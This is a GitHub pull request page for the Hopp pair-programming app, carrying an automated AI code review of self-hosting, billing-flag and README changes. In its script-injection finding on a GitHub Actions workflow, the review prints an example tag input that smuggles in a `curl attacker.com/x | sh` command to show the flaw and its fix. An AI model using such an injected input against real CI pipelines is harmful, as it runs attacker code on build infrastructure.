Conversation
Restructure README to maximize GitHub stars and gethopp.app signups:
- Add prominent nav row (Website, Download, Sign up, Docs, Self-host, Discord, Twitter)
- Add demo GIF placeholder above the fold
- Add GitHub stars badge to encourage starring
- Rewrite tagline for dev audience + Tuple alternative positioning
- Add 3-step Try Hopp section (download, sign up, pair)
- Rename Features → Why Hopp, reorder for dev appeal
- Add Cap-style self-host quickstart tease linking to selfhost/README.md
- Add Paid Cloud supports development section (Plausible-style)
- Collapse tech stack and roadmap sections
- Add SEO keywords: pair programming, screen sharing for developers, self-hosted
✅ Deploy Preview for hoppdocs ready!
To edit notification comments on pull requests, go to your Netlify project configuration.
📝 Walkthrough

Threads a Stripe billing feature flag through backend access checks, moves custom backend URL into persisted per-user settings with event wiring, adds a full self-hosting Docker Compose + LiveKit/Caddy configs, updates Dockerfile and CI to multi-arch publishing, bumps Go deps, and rewrites README/docs.

Changes
- Stripe Billing Feature Flag
- Desktop App: Custom Backend URL (Tauri)
- Self-hosting Infrastructure & Docker/CI
- Backend Dependency Bumps
- Documentation & README
Sequence Diagram(s)

```mermaid
sequenceDiagram
    participant Client
    participant Handler as Backend Handler
    participant Config as Config
    participant Models as Models/DB
    Client->>Handler: request (user/room/join)
    Handler->>Config: IsStripeEnabled()
    Handler->>Models: GetUserWithSubscription(user, stripeEnabled)
    alt stripeEnabled == false
        Models-->>Handler: UserWithSubscription{IsPro:true}
    else
        Models-->>Handler: UserWithSubscription{IsPro/Trial computed}
    end
    Handler-->>Client: allow or deny based on subscription/trial
```
Estimated code review effort: 🎯 4 (Complex) | ⏱️ ~60 minutes

Possibly related PRs
Suggested reviewers
Poem
🚥 Pre-merge checks | ✅ 4 | ❌ 1

❌ Failed checks (1 inconclusive)
✅ Passed checks (4 passed)
✏️ Tip: You can configure your own custom pre-merge checks in the settings.

✨ Finishing Touches
- 📝 Generate docstrings
- 🧪 Generate unit tests (beta)
Warning: There were issues while running some tools. Please review the errors and either fix the tool's configuration or disable the tool if it's a critical failure.

🔧 golangci-lint (2.12.1)

```
level=error msg="[linters_context] typechecking error: pattern ./...: directory prefix . does not contain main module or its selected dependencies"
```

Thanks for using CodeRabbit! It's free for OSS, and your support helps us grow. If you like it, consider giving us a shout-out.
Actionable comments posted: 15
Caution
Some comments are outside the diff and can’t be posted inline due to platform limitations.
⚠️ Outside diff range comments (1)
tauri/src/windows/window-utils.ts (1)
292-297: ⚠️ Potential issue | 🟠 Major | ⚡ Quick win

Clear auth before broadcasting the backend switch.

`set_hopp_server_url` emits `hopp_server_url_changed`, and only after that do we delete the stored token here. That creates a window where the main app can repoint to the new backend while still holding the old JWT, which risks sending that token to the wrong server. Please either clear the token first or make this an atomic backend command.

Suggested fix

```diff
 const setHoppServerUrl = async (url: string | null): Promise<void> => {
   try {
-    await invoke("set_hopp_server_url", { url });
-    // Sign out the user when changing the server URL
     await deleteStoredToken();
+    await invoke("set_hopp_server_url", { url });
   } catch (error) {
     console.error("Failed to set hopp server url:", error);
     throw error;
   }
 };
```

🤖 Prompt for AI Agents
Verify each finding against current code. Fix only still-valid issues, skip the rest with a brief reason, keep changes minimal, and validate. In `@tauri/src/windows/window-utils.ts` around lines 292 - 297, The setHoppServerUrl function currently calls invoke("set_hopp_server_url") before deleting the stored token, risking the old JWT being sent to a newly pointed backend; change the sequence so you clear local auth first (call deleteStoredToken() before invoke) or, alternatively, modify the backend command to atomically both change the URL and clear auth; update the setHoppServerUrl method to call deleteStoredToken() prior to invoke("set_hopp_server_url", { url }) (or implement an atomic invoke like "set_hopp_server_url_and_clear_token") and ensure error handling still covers both operations.
🧹 Nitpick comments (2)
backend/dev-compose.yml (1)
24-26: 💤 Low value

Unused named volume declaration — consider removing.

The top-level `volumes.cache` entry is never mounted by any service; both `cache` (Redis) and `db` (Postgres) use bind mounts directly. Adding `driver: local` to this already-unreferenced volume adds dead configuration that could mislead future readers into thinking a named volume is in active use.

🗑️ Proposed cleanup

```diff
-volumes:
-  cache:
-    driver: local
```

🤖 Prompt for AI Agents
Verify each finding against current code. Fix only still-valid issues, skip the rest with a brief reason, keep changes minimal, and validate. In `@backend/dev-compose.yml` around lines 24 - 26, Remove the unused top-level named volume declaration for "cache" under the compose top-level "volumes" section (the orphaned volumes.cache entry with driver: local); either delete that volumes.cache block entirely or switch the Redis/Postgres service volume bindings (services named "cache" and "db") to reference the named volume instead — update whichever approach you choose so there is no dead configuration remaining and service volume references (cache/db) match the declared volume names.

web-app/src/constants.ts (1)
25-28: ⚡ Quick win

Build the backend endpoints with `new URL()` instead of string concatenation.

This works, but it goes against the repo's frontend URL-construction rule and is easier to break on base-path/trailing-slash changes. Prefer composing these endpoints with `new URL()`.

Suggested refactor

```diff
 export const BACKEND_URLS = {
   BASE: baseUrl,
-  AUTHENTICATE_APP: `${baseUrl}/api/auth/authenticate-app`,
-  INVITATION_DETAILS: (uuid: string) => `${baseUrl}/api/invitation-details/${uuid}`,
+  AUTHENTICATE_APP: new URL("/api/auth/authenticate-app", baseUrl).toString(),
+  INVITATION_DETAILS: (uuid: string) =>
+    new URL(`/api/invitation-details/${uuid}`, baseUrl).toString(),
 } as const;
```

As per coding guidelines, use `new URL()` and `URLSearchParams` instead of string concatenation for URL construction in frontend code.

🤖 Prompt for AI Agents
Verify each finding against current code. Fix only still-valid issues, skip the rest with a brief reason, keep changes minimal, and validate. In `@web-app/src/constants.ts` around lines 25 - 28, The BACKEND_URLS entries currently concatenate strings which breaks the repository rule and can fail on base-path or trailing-slash changes; update AUTHENTICATE_APP and INVITATION_DETAILS to build endpoints with new URL(path, BASE) (or new URL(path, baseUrl) where BASE is defined) and return their .toString() (for the INVITATION_DETAILS function use the provided uuid to create the path via new URL(`/api/invitation-details/${uuid}`, BASE).toString()); ensure AUTHENTICATE_APP is created the same way (new URL('/api/auth/authenticate-app', BASE).toString()) while leaving BASE referencing the existing baseUrl variable.
🤖 Prompt for all review comments with AI agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.
Inline comments:
In @.github/workflows/publish-backend-image.yml:
- Line 38: The workflow step running the shell command "cp
web-app/static/react/assets/index.html backend/web/web-app.html" can fail if the
target directory backend/web does not exist; modify the step to ensure the
directory exists before copying by running a directory-creation guard (e.g.,
mkdir -p backend/web) prior to the cp command so the copy is safe regardless of
repo state.
- Around line 52-58: The step currently expands the workflow input expression
directly in the shell which allows command injection; instead assign the
expression to a dedicated environment variable (e.g., INPUT_TAG) via the step's
env: mapping or an earlier safe assignment so the shell only sees a plain
string, then in the run: body read that env var into TAG (fall back to
GITHUB_REF when INPUT_TAG is empty) and write to GITHUB_OUTPUT and the tags line
using the TAG variable; update references to github.event.inputs.tag, TAG,
GITHUB_REF and GITHUB_OUTPUT accordingly and ensure all uses are quoted or
treated as data, not raw expanded expressions.
In `@backend/Dockerfile`:
- Around line 13-19: The container currently runs as root; add a USER directive
to switch to the distroless nonroot user (uid 65532) before CMD to satisfy
least-privilege (e.g., USER 65532), and ensure the artifacts copied by COPY
--from=builder /out/server and COPY web ./web are readable/executable by that
user (adjust build-stage ownership or chown in the builder stage so /app/server
and /app/web are owned by uid 65532) so the server binary can run under the
nonroot account.
In `@backend/internal/handlers/handlers.go`:
- Around line 590-593: GetUserWithSubscription is crashing when called from the
handlers (user.TeamID can be nil for users created without a team), so update
the GetUserWithSubscription function in models/user.go to guard against a nil
TeamID before dereferencing it: add an early nil-check (or use safe handling)
for the TeamID path the function takes, handle the no-team case (e.g., skip
team-related lookups or return a sensible default) and ensure the function
returns a non-panicking result/error back to callers like the call site in
handlers.go that invokes GetUserWithSubscription.
In `@backend/internal/models/user.go`:
- Around line 277-284: In GetUserWithSubscription, avoid dereferencing
user.TeamID when stripeEnabled is true by adding a nil guard before calling
GetTeamByID: if user.TeamID == nil, return a sensible default
UserWithSubscription (e.g., User: *user and IsPro: false or other
application-expected values) rather than calling
GetTeamByID(strconv.Itoa(int(*user.TeamID))); otherwise proceed to call
GetTeamByID as now. This change in GetUserWithSubscription will prevent the
panic observed when handlers.User calls this function for users created via
ManualSignUp with a nil TeamID.
In `@docs/src/content/docs/features/settings.mdx`:
- Around line 17-25: The docs are inconsistent with the implementation: update
the copy and defaults to match UserSettings::default() by changing the dock-icon
description so that enabling show_dock_icon_in_call keeps the dock icon visible
during calls (e.g., "Show dock icon when in call — Keep the dock icon visible
during a call. Default: on.") and change the microphone default text to reflect
start_mic_on_call defaults to false (e.g., "Start microphone on call start —
Automatically unmute the microphone when a call starts. Default: off."). Ensure
the referenced setting names show_dock_icon_in_call and start_mic_on_call are
mentioned so readers map them to UserSettings::default().
In `@docs/src/content/docs/open-source/self-hosting.md`:
- Around line 56-58: Update the domain placeholder in Step 5 to match the rest
of the doc: replace the literal `{DOMAIN}` with the same notation used elsewhere
(e.g., `${DOMAIN}` or the concrete example `hopp.example.com`) so the
instruction "Open `https://{DOMAIN}`" becomes "Open `https://${DOMAIN}`" (or
`https://hopp.example.com`) to avoid confusion between shell variables and
template placeholders.
In `@selfhost/.env.example`:
- Line 6: Update the misleading comment in the .env.example so it explicitly
warns that while the stack can start with only DOMAIN set, SESSION_SECRET,
LIVEKIT_API_KEY, LIVEKIT_API_SECRET, and POSTGRES_PASSWORD must be regenerated
for any production deployment; replace the line "# Only DOMAIN is strictly
required. All secrets should be generated." with a clear security notice naming
those variables and stating that their current defaults (empty or publicly-known
values) are insecure and must be replaced with strong, generated secrets before
production.
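The regeneration step that notice calls for can be sketched as below — a hedged example only: key names mirror `selfhost/.env.example`, but the 32-byte/hex strength is an assumption, not a documented requirement of the stack.

```typescript
import { randomBytes } from "node:crypto";

// Generate replacements for the insecure defaults named above.
// Key names mirror selfhost/.env.example; 32 random bytes (64 hex chars)
// is an assumed strength, not a requirement stated by the project.
function generateSecrets(): Record<string, string> {
  return {
    SESSION_SECRET: randomBytes(32).toString("hex"),
    LIVEKIT_API_KEY: randomBytes(16).toString("hex"),
    LIVEKIT_API_SECRET: randomBytes(32).toString("hex"),
    POSTGRES_PASSWORD: randomBytes(32).toString("hex"),
  };
}
```

Equivalent one-liners such as `openssl rand -hex 32` work just as well; the point is that none of the shipped defaults survive into production.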
In `@selfhost/compose.override.example.yml`:
- Around line 15-22: The livekit compose example currently has two sibling
"ports" keys so the second overrides the first making "ports: !reset []"
ineffective; fix by consolidating into a single ports key that uses the !reset
tag with the desired list value (replace the duplicate "ports:" block and the
separate "ports: !reset []" with one "ports: !reset" whose value is the full
ports list), updating the livekit block so the reset semantics apply correctly.
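For illustration, the consolidated override could look like the fragment below (a sketch only — the `livekit` service name comes from the comment above, and the commented port value is a placeholder). Note that Compose's `!reset` clears the inherited value while `!override` replaces it with a new one, so which tag applies depends on whether the goal is "no published ports" or "a different set of ports".

```yaml
services:
  livekit:
    # A single `ports` key, so the reset is not shadowed by a sibling key.
    ports: !reset []
    # Or, to publish a different set of ports instead of clearing them:
    # ports: !override
    #   - "7880:7880"
```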
In `@selfhost/compose.yml`:
- Around line 5-13: Add a healthcheck to the db service so Postgres is marked
healthy only after it accepts connections: under the db service (image
postgres:16-alpine) add a healthcheck that runs pg_isready (or equivalent), with
sensible interval, timeout, retries and start_period so initialization completes
before healthy; then update the backend's depends_on entry to wait for the db
service becoming healthy (depends_on -> condition/service_healthy or the compose
version-appropriate depends_on: db: {condition: service_healthy} / waiting
behavior) so migrations/startup won't run until the DB is ready.
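Sketched as a compose fragment — `pg_isready` is the standard readiness probe shipped with the Postgres image, but the interval/timeout/retry values and the `POSTGRES_USER` default here are assumptions, not values from the repo:

```yaml
services:
  db:
    image: postgres:16-alpine
    healthcheck:
      # Mark the service healthy only once Postgres accepts connections.
      test: ["CMD-SHELL", "pg_isready -U ${POSTGRES_USER:-postgres}"]
      interval: 5s
      timeout: 3s
      retries: 10
      start_period: 10s

  backend:
    depends_on:
      db:
        condition: service_healthy
```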
- Line 24: The Docker Compose service image is using an unpinned tag
"livekit/livekit-server:latest" which can introduce breaking upgrades; update
the image reference in compose.yml (the "image: livekit/livekit-server:latest"
entry) to a specific major or patch tag (e.g., "livekit/livekit-server:v1.8.4"
or another tested release) and document/coordinate bumping that tag alongside
HOPP_VERSION so the LiveKit version is intentionally upgraded.
- Line 36: Update the Docker image reference from the maintainer's personal
namespace to the project namespace by replacing "iparaskev/hopp-backend" with
"gethopp/hopp-backend" in the compose service image declaration (preserve the
existing tag variable format ${HOPP_VERSION:-latest}); ensure the change is made
where the image: line is defined so the service uses
gethopp/hopp-backend:${HOPP_VERSION:-latest} instead of the iparaskev image.
In `@tauri/src-tauri/src/app_state.rs`:
- Line 12: Add a one-release migration that preserves the old top-level
hopp_server_url by copying it into the new nested user_settings field during
load/deserialization; specifically, in the AppState load/migration path (where
AppState is constructed/deserialized), check the old top-level hopp_server_url
field and if user_settings.hopp_server_url (or equivalent) is None/empty and the
top-level hopp_server_url is Some(value), set user_settings.hopp_server_url =
value and clear or ignore the top-level field afterwards so existing self-hosted
endpoints are retained for upgrades.
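The shape of that one-release migration, sketched in TypeScript for brevity (field names mirror the comment above, not the actual Rust structs in `app_state.rs`):

```typescript
// Hypothetical persisted shapes; the real types live in Rust.
interface UserSettings { hopp_server_url?: string | null; }
interface PersistedState { hopp_server_url?: string | null; user_settings: UserSettings; }

// On load, copy the legacy top-level URL into the nested settings exactly once,
// without clobbering a value the user has already set there.
function migrateServerUrl(state: PersistedState): PersistedState {
  if (!state.user_settings.hopp_server_url && state.hopp_server_url) {
    state.user_settings.hopp_server_url = state.hopp_server_url;
  }
  delete state.hopp_server_url; // legacy field is dropped after migration
  return state;
}
```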
In `@tauri/src/windows/main-window/login.tsx`:
- Line 16: The loginJwtUrl construction using template literals can produce
double-scheme URLs when customServerUrl includes a scheme; update the logic that
builds loginJwtUrl to parse/normalize the base using new URL(...) with a default
scheme fallback (use import.meta.env.VITE_API_BASE_URL when customServerUrl is
empty), then create the final URL by resolving the '/login-app' path via new
URL('/login-app', baseUrl). Ensure you reference and update the variable
loginJwtUrl and the source values customServerUrl and
import.meta.env.VITE_API_BASE_URL so the base always has a valid scheme and
pathname resolution is done by the URL API rather than string concatenation.
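One way that normalization could look — a sketch, not the actual fix: `buildLoginJwtUrl` is a hypothetical helper, and defaulting scheme-less input to https is an assumption.

```typescript
// Resolve the login URL from either a custom server URL or the build-time base.
function buildLoginJwtUrl(customServerUrl: string | null, fallbackBase: string): string {
  const raw = (customServerUrl ?? "").trim() || fallbackBase;
  // Tolerate bases entered with or without a scheme; default to https.
  const base = /^[a-z][a-z0-9+.-]*:\/\//i.test(raw) ? raw : `https://${raw}`;
  // Let the URL API handle path resolution instead of string concatenation.
  return new URL("/login-app", base).toString();
}
```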
In `@tauri/src/windows/settings/main.tsx`:
- Around line 147-160: The handlers (onKeyDown/onBlur) call
tauriUtils.setHoppServerUrl and unconditionally
posthog.capture("custom_backend_url_changed"); change this so the analytics
event is only emitted for hosted analytics: compute const trimmed =
serverUrl.trim() || null, await tauriUtils.setHoppServerUrl(trimmed) and
refetchSettings as before, but only call
posthog.capture("custom_backend_url_changed") when the change is not switching
to a self-hosted backend (e.g., trimmed !== null) AND a hosted-analytics flag is
enabled (check an existing flag like settings.isHostedAnalyticsEnabled or inject
a isHostedAnalyticsEnabled helper); alternatively remove the posthog.capture
call from these handlers entirely if no hosted-only flag is available. Ensure
you update both the onKeyDown and onBlur handlers and use
settings.hopp_server_url/refetchSettings/serverUrl to determine the change.
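The gating condition that prompt describes, extracted as a tiny predicate — names are assumptions: `isHostedAnalyticsEnabled` is the hypothetical flag the comment suggests, and `trimmed` follows its `serverUrl.trim() || null` convention.

```typescript
// Decide whether the analytics event should fire for a backend-URL change.
// Per the comment above: only when hosted analytics is enabled AND the change
// is not a switch to a self-hosted backend (its stated condition: trimmed !== null).
function shouldCaptureBackendChange(trimmed: string | null, isHostedAnalyticsEnabled: boolean): boolean {
  return isHostedAnalyticsEnabled && trimmed !== null;
}
```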
---
Outside diff comments:
In `@tauri/src/windows/window-utils.ts`:
- Around line 292-297: The setHoppServerUrl function currently calls
invoke("set_hopp_server_url") before deleting the stored token, risking the old
JWT being sent to a newly pointed backend; change the sequence so you clear
local auth first (call deleteStoredToken() before invoke) or, alternatively,
modify the backend command to atomically both change the URL and clear auth;
update the setHoppServerUrl method to call deleteStoredToken() prior to
invoke("set_hopp_server_url", { url }) (or implement an atomic invoke like
"set_hopp_server_url_and_clear_token") and ensure error handling still covers
both operations.
---
Nitpick comments:
In `@backend/dev-compose.yml`:
- Around line 24-26: Remove the unused top-level named volume declaration for
"cache" under the compose top-level "volumes" section (the orphaned
volumes.cache entry with driver: local); either delete that volumes.cache block
entirely or switch the Redis/Postgres service volume bindings (services named
"cache" and "db") to reference the named volume instead — update whichever
approach you choose so there is no dead configuration remaining and service
volume references (cache/db) match the declared volume names.
In `@web-app/src/constants.ts`:
- Around line 25-28: The BACKEND_URLS entries currently concatenate strings
which breaks the repository rule and can fail on base-path or trailing-slash
changes; update AUTHENTICATE_APP and INVITATION_DETAILS to build endpoints with
new URL(path, BASE) (or new URL(path, baseUrl) where BASE is defined) and return
their .toString() (for the INVITATION_DETAILS function use the provided uuid to
create the path via new URL(`/api/invitation-details/${uuid}`,
BASE).toString()); ensure AUTHENTICATE_APP is created the same way (new
URL('/api/auth/authenticate-app', BASE).toString()) while leaving BASE
referencing the existing baseUrl variable.
🪄 Autofix (Beta)
Fix all unresolved CodeRabbit comments on this PR:
- Push a commit to this branch (recommended)
- Create a new PR with the fixes
ℹ️ Review info
⚙️ Run configuration
Configuration used: defaults
Review profile: CHILL
Plan: Pro
Run ID: 9a5bbd7a-8bba-44ec-8482-c5b8cac5de04
⛔ Files ignored due to path filters (4)
- `backend/go.sum` is excluded by `!**/*.sum`
- `docs/src/assets/demo.gif` is excluded by `!**/*.gif`
- `docs/src/assets/settings.png` is excluded by `!**/*.png`
- `docs/src/assets/view.png` is excluded by `!**/*.png`
📒 Files selected for processing (33)
- `.github/workflows/publish-backend-image.yml`
- `README.md`
- `backend/Dockerfile`
- `backend/Taskfile.yml`
- `backend/dev-compose.yml`
- `backend/docker-files/fullstack-compose.yml`
- `backend/go.mod`
- `backend/internal/config/config.go`
- `backend/internal/handlers/handlers.go`
- `backend/internal/handlers/slackHandlers.go`
- `backend/internal/handlers/utils.go`
- `backend/internal/handlers/websocketHandlers.go`
- `backend/internal/models/user.go`
- `docs/astro.config.mjs`
- `docs/src/content/docs/features/settings.mdx`
- `docs/src/content/docs/open-source/self-hosting.md`
- `selfhost/.env.example`
- `selfhost/.gitignore`
- `selfhost/Caddyfile`
- `selfhost/README.md`
- `selfhost/compose.override.example.yml`
- `selfhost/compose.yml`
- `selfhost/livekit.dev.yaml`
- `selfhost/livekit.yaml`
- `tauri/src-tauri/src/app_state.rs`
- `tauri/src-tauri/src/main.rs`
- `tauri/src/core_payloads.ts`
- `tauri/src/windows/main-window/app.tsx`
- `tauri/src/windows/main-window/login.tsx`
- `tauri/src/windows/main-window/tabs/Debug.tsx`
- `tauri/src/windows/settings/main.tsx`
- `tauri/src/windows/window-utils.ts`
- `web-app/src/constants.ts`
💤 Files with no reviewable changes (1)
- backend/docker-files/fullstack-compose.yml
```yaml
        run: yarn workspace web-app build

      - name: Inject web-app into backend
        run: cp web-app/static/react/assets/index.html backend/web/web-app.html
```
backend/web/ may not exist when cp runs, silently breaking the image build
If backend/web/ is not committed to the repo (it contains generated content), cp will fail with "No such file or directory". Add a mkdir -p guard so the step is safe regardless of repo state.
🔧 Proposed fix

```diff
       - name: Inject web-app into backend
-        run: cp web-app/static/react/assets/index.html backend/web/web-app.html
+        run: |
+          mkdir -p backend/web
+          cp web-app/static/react/assets/index.html backend/web/web-app.html
```
🤖 Prompt for AI Agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.
In @.github/workflows/publish-backend-image.yml at line 38, The workflow step
running the shell command "cp web-app/static/react/assets/index.html
backend/web/web-app.html" can fail if the target directory backend/web does not
exist; modify the step to ensure the directory exists before copying by running
a directory-creation guard (e.g., mkdir -p backend/web) prior to the cp command
so the copy is safe regardless of repo state.
```shell
          if [[ -n "${{ github.event.inputs.tag }}" ]]; then
            TAG="${{ github.event.inputs.tag }}"
          else
            TAG="${GITHUB_REF#refs/tags/}"
          fi
          echo "version=$TAG" >> "$GITHUB_OUTPUT"
          echo "tags=gethopp/hopp-backend:${TAG},gethopp/hopp-backend:latest" >> "$GITHUB_OUTPUT"
```
Script injection: ${{ github.event.inputs.tag }} is expanded directly into the shell command
GitHub Actions `${{ }}` expressions inside `run:` blocks are substituted before the shell interprets the command. When a workflow_dispatch input is placed directly in a `run:` block, an actor who can trigger the workflow can break out of the intended command and execute arbitrary code. An input like `v1.0"; curl attacker.com/x | sh; echo "` would run unimpeded.
Assign the expression to an environment variable so the shell always treats it as a plain string:
🔒 Proposed fix

```diff
       - name: Determine image tags
         id: tags
+        env:
+          INPUT_TAG: ${{ github.event.inputs.tag }}
         run: |
-          if [[ -n "${{ github.event.inputs.tag }}" ]]; then
-            TAG="${{ github.event.inputs.tag }}"
+          if [[ -n "$INPUT_TAG" ]]; then
+            TAG="$INPUT_TAG"
           else
             TAG="${GITHUB_REF#refs/tags/}"
           fi
           echo "version=$TAG" >> "$GITHUB_OUTPUT"
           echo "tags=gethopp/hopp-backend:${TAG},gethopp/hopp-backend:latest" >> "$GITHUB_OUTPUT"
```

🤖 Prompt for AI Agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.
In @.github/workflows/publish-backend-image.yml around lines 52 - 58, The step
currently expands the workflow input expression directly in the shell which
allows command injection; instead assign the expression to a dedicated
environment variable (e.g., INPUT_TAG) via the step's env: mapping or an earlier
safe assignment so the shell only sees a plain string, then in the run: body
read that env var into TAG (fall back to GITHUB_REF when INPUT_TAG is empty) and
write to GITHUB_OUTPUT and the tags line using the TAG variable; update
references to github.event.inputs.tag, TAG, GITHUB_REF and GITHUB_OUTPUT
accordingly and ensure all uses are quoted or treated as data, not raw expanded
expressions.
```dockerfile
FROM gcr.io/distroless/static-debian12
WORKDIR /app
COPY --from=builder /out/server .
COPY web ./web

# Set environment variable to disable TLS
ENV USE_TLS=false

EXPOSE 1926

# Run the binary
CMD ["./server"]
```
Container runs as root — add a USER directive before CMD
The distroless runtime image ships a built-in nonroot user (uid 65532). Running the server as root violates the principle of least privilege and is flagged by Trivy rule DS-0002.
🔒 Proposed fix

```diff
 FROM gcr.io/distroless/static-debian12
 WORKDIR /app
 COPY --from=builder /out/server .
 COPY web ./web
 ENV USE_TLS=false
 EXPOSE 1926
+USER nonroot:nonroot
 CMD ["./server"]
```
🤖 Prompt for AI Agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.
In `@backend/Dockerfile` around lines 13 - 19, The container currently runs as
root; add a USER directive to switch to the distroless nonroot user (uid 65532)
before CMD to satisfy least-privilege (e.g., USER 65532), and ensure the
artifacts copied by COPY --from=builder /out/server and COPY web ./web are
readable/executable by that user (adjust build-stage ownership or chown in the
builder stage so /app/server and /app/web are owned by uid 65532) so the server
binary can run under the nonroot account.
```go
userWithSubscription, err := models.GetUserWithSubscription(h.DB, user, h.Config.IsStripeEnabled())
if err != nil {
	return c.JSON(http.StatusInternalServerError, map[string]string{"error": err.Error()})
}
```
This call site is the concrete exposure for the nil TeamID panic in GetUserWithSubscription.
Users created without a team (no team_name, no invite UUID in ManualSignUp) reach this line with user.TeamID == nil. Adding the nil guard to GetUserWithSubscription (see comment in models/user.go) resolves this without changes here.
🤖 Prompt for AI Agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.
In `@backend/internal/handlers/handlers.go` around lines 590 - 593,
GetUserWithSubscription is crashing when called from the handlers (user.TeamID
can be nil for users created without a team), so update the
GetUserWithSubscription function in models/user.go to guard against a nil TeamID
before dereferencing it: add an early nil-check (or use safe handling) for the
TeamID path the function takes, handle the no-team case (e.g., skip team-related
lookups or return a sensible default) and ensure the function returns a
non-panicking result/error back to callers like the call site in handlers.go
that invokes GetUserWithSubscription.
```go
func GetUserWithSubscription(db *gorm.DB, user *User, stripeEnabled bool) (*UserWithSubscription, error) {
	if !stripeEnabled {
		return &UserWithSubscription{User: *user, IsPro: true}, nil
	}

	team, err := GetTeamByID(db, strconv.Itoa(int(*user.TeamID)))
	if err != nil {
		return nil, err
```
Missing nil guard for user.TeamID on the Stripe-enabled path may panic.
When stripeEnabled == true, execution falls through to line 282, which dereferences user.TeamID unconditionally. A user created via ManualSignUp without a team name or invite UUID has TeamID == nil, so calling User() on that account in a cloud deployment will panic here.
The checkUserHasAccess path is safe (it guards in utils.go before calling this function), but the User() handler in handlers.go calls GetUserWithSubscription directly with no nil pre-check.
🛡️ Proposed fix — add nil guard after the stripeEnabled early return

```diff
 func GetUserWithSubscription(db *gorm.DB, user *User, stripeEnabled bool) (*UserWithSubscription, error) {
 	if !stripeEnabled {
 		return &UserWithSubscription{User: *user, IsPro: true}, nil
 	}
+
+	if user.TeamID == nil {
+		return &UserWithSubscription{User: *user, IsPro: false}, nil
+	}
 	team, err := GetTeamByID(db, strconv.Itoa(int(*user.TeamID)))
```
🤖 Prompt for AI Agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.
In `@backend/internal/models/user.go` around lines 277 - 284, In
GetUserWithSubscription, avoid dereferencing user.TeamID when stripeEnabled is
true by adding a nil guard before calling GetTeamByID: if user.TeamID == nil,
return a sensible default UserWithSubscription (e.g., User: *user and IsPro:
false or other application-expected values) rather than calling
GetTeamByID(strconv.Itoa(int(*user.TeamID))); otherwise proceed to call
GetTeamByID as now. This change in GetUserWithSubscription will prevent the
panic observed when handlers.User calls this function for users created via
ManualSignUp with a nil TeamID.
```yaml
      - cache

  backend:
    image: iparaskev/hopp-backend:${HOPP_VERSION:-latest}
```
Move backend image to the project's own Docker Hub namespace
iparaskev/hopp-backend is the PR author's personal Docker Hub account. If the image is removed or the account is renamed, every self-hosted deployment breaks with no recourse. For an OSS project this is a critical supply-chain reliability gap; the image should live under the gethopp/ organization (e.g., gethopp/hopp-backend).
🔧 Proposed fix

```diff
-    image: iparaskev/hopp-backend:${HOPP_VERSION:-latest}
+    image: gethopp/hopp-backend:${HOPP_VERSION:-latest}
```
🤖 Prompt for AI Agents
In `@selfhost/compose.yml` at line 36: update the Docker image reference from the maintainer's personal namespace to the project namespace by replacing `iparaskev/hopp-backend` with `gethopp/hopp-backend` in the compose service `image:` declaration, preserving the existing tag format `${HOPP_VERSION:-latest}`, so the service uses `gethopp/hopp-backend:${HOPP_VERSION:-latest}` instead of the `iparaskev` image.
```tsx
const posthog = usePostHog();
const customServerUrl = useStore((state) => state.customServerUrl);

const loginJwtUrl = `https://${customServerUrl || (import.meta.env.VITE_API_BASE_URL as string)}/login-app`;
```
🧩 Analysis chain

🏁 Script executed:

```bash
#!/bin/bash
# Check how customServerUrl / hopp_server_url is set in settings
rg -n "hopp_server_url\|setHoppServerUrl\|customServerUrl" --type=ts -C3
# Check VITE_API_BASE_URL definition / usage
rg -n "VITE_API_BASE_URL" -C3
```

🏁 Script executed:

```bash
cd tauri && find . -name "*.tsx" -o -name "*.ts" | xargs grep -l "customServerUrl" | head -5
```

🏁 Script executed:

```bash
cd web-app && cat -n src/constants.ts
```

🏁 Script executed:

```bash
grep -rn "hopp_server_url\|customServerUrl" tauri/ --include="*.ts" --include="*.tsx" -B2 -A2
```

🏁 Script executed:

```bash
grep -n "serverUrl" tauri/src/windows/settings/main.tsx -B5 -A10 | head -50
```

🏁 Script executed:

```bash
grep -rn "set_hopp_server_url\|setHoppServerUrl" tauri/src/windows/ --include="*.ts" --include="*.tsx" -B3 -A3
```

🏁 Script executed:

```bash
find . -name "*.rs" -o -name "*.go" | xargs grep -l "set_hopp_server_url\|hopp_server_url" 2>/dev/null | head -3
```

🏁 Script executed:

```bash
rg "set_hopp_server_url" --type=rs -B3 -A10 2>/dev/null | head -40
```

🏁 Script executed:

```bash
cat tauri/src-tauri/src/app_state.rs | grep -n "hopp_server_url\|set_hopp_server_url" -B2 -A8 | head -50
```

🏁 Script executed:

```bash
rg "hopp_server_url" tauri/src-tauri/src/main.rs -B3 -A8
```
Use `new URL()` to prevent double-scheme corruption and satisfy coding guidelines

The code hardcodes `https://`, but `customServerUrl` has no validation: users can paste full URLs like `https://myserver.com`, producing `https://https://myserver.com/login-app`, which breaks login for self-hosted deployments. Additionally, template-literal URL construction violates the frontend coding guidelines.

Replace the template literal with `new URL()` and normalize the base URL so it always carries a scheme:

🔧 Proposed fix

```diff
-  const loginJwtUrl = `https://${customServerUrl || (import.meta.env.VITE_API_BASE_URL as string)}/login-app`;
+  const rawBase = customServerUrl || (import.meta.env.VITE_API_BASE_URL as string);
+  const baseUrl = rawBase.startsWith("http") ? rawBase : `https://${rawBase}`;
+  const loginJwtUrl = new URL("/login-app", baseUrl).toString();
```
🤖 Prompt for AI Agents
In `@tauri/src/windows/main-window/login.tsx` at line 16: the `loginJwtUrl` construction using template literals can produce double-scheme URLs when `customServerUrl` includes a scheme. Update the logic that builds `loginJwtUrl` to normalize the base with a default-scheme fallback (use `import.meta.env.VITE_API_BASE_URL` when `customServerUrl` is empty), then create the final URL by resolving the `/login-app` path via `new URL('/login-app', baseUrl)`. This ensures the base always has a valid scheme and pathname resolution is done by the URL API rather than string concatenation.
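The same normalization logic can be illustrated outside the TypeScript codebase; the following is a hedged Go sketch using the standard `net/url` package, with `loginURL` being an invented helper name (the real fix lives in `login.tsx`):

```go
package main

import (
	"fmt"
	"net/url"
	"strings"
)

// loginURL mirrors the proposed fix: ensure the base carries a scheme,
// then let the URL API resolve the /login-app path instead of
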